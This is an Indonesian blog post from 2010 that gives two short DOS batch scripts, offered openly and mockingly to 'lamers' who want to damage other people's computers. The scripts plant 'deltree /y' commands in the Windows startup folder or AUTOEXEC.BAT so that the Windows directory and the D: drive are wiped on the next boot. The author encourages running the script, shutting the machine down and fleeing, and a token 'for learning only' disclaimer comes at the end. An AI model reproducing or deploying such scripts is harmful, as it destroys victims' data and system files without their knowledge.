DOS Programing

September 17, 2010 at 10:31 am Tinggalkan komentar


Program perusak buat yang hobi ngerusakin komputer orang wkakakak dosa ditanggung yang mencoba karena saya hanya mencoba untuk berbagi…..

Hmm.. udah lama sih pengin mbuat artikel ini. Tapi baru kali ini moodnya datang hihihi…
Ini khusus buat para “Lamer sejati” yang pengin ngerusak kompynya orang.
Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!!
Okay, ngga’ usah banyak omong, lansung aja copy-pastekan
code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat:

@echo off

echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

atau

@echo off

echo deltree /y %windir%\*.*>> AUTOEXEC.BAT

echo deltree /y d:\*.*>> AUTOEXEC.BAT

wELL, ga’ perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan
(misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi…
program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.

ingat gunakan untuk belajar jangan gunakan untuk merusak!!

Entry filed under: MS-DOS, Tips & Trick. Tags: , , , .

Apa Itu 7 Layer OSI dalam Jaringan ? TIPS Manipulasi jalannya aplikasi

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Trackback this post  |  Subscribe to the comments via RSS Feed


Follow me

Welcome blog ini berisi sedikit informasi yang mungkin bisa bermanfaat bagi kita semua.
Blog ini bisa diakses melalui :

♫ www.lebe-lebe.co.cc
♫ cheplus2.wordpress.com

terima kasih sudah berkunjung silahkan meninggalkan komentar atau saran!

Visitors are't from Indonesian please use the translator below:

Silakan masukkan alamat email Anda untuk menerima email postingan terbaru. Gratis.

Bergabunglah dengan 3 pengikut lainnya

Daftar Isi

kalender

September 2010
S S R K J S M
« Agu   Des »
 12345
6789101112
13141516171819
20212223242526
27282930  

Daftar Postingan

Catatan Kecilku

Error: Twitter did not respond. Please wait a few minutes and refresh this page.

Info Anda

IP

Statistika

  • 19,485 Pengunjung
free counters
online counter
© nandra naim.2010-2011. Semua artikel bebas untuk dikopi paste, ditulis ulang dan disebarluaskan dengan tujuan nonkomersial, baik dengan atau tanpa menyertakan sumber penulisan.

Feeds


%d blogger menyukai ini: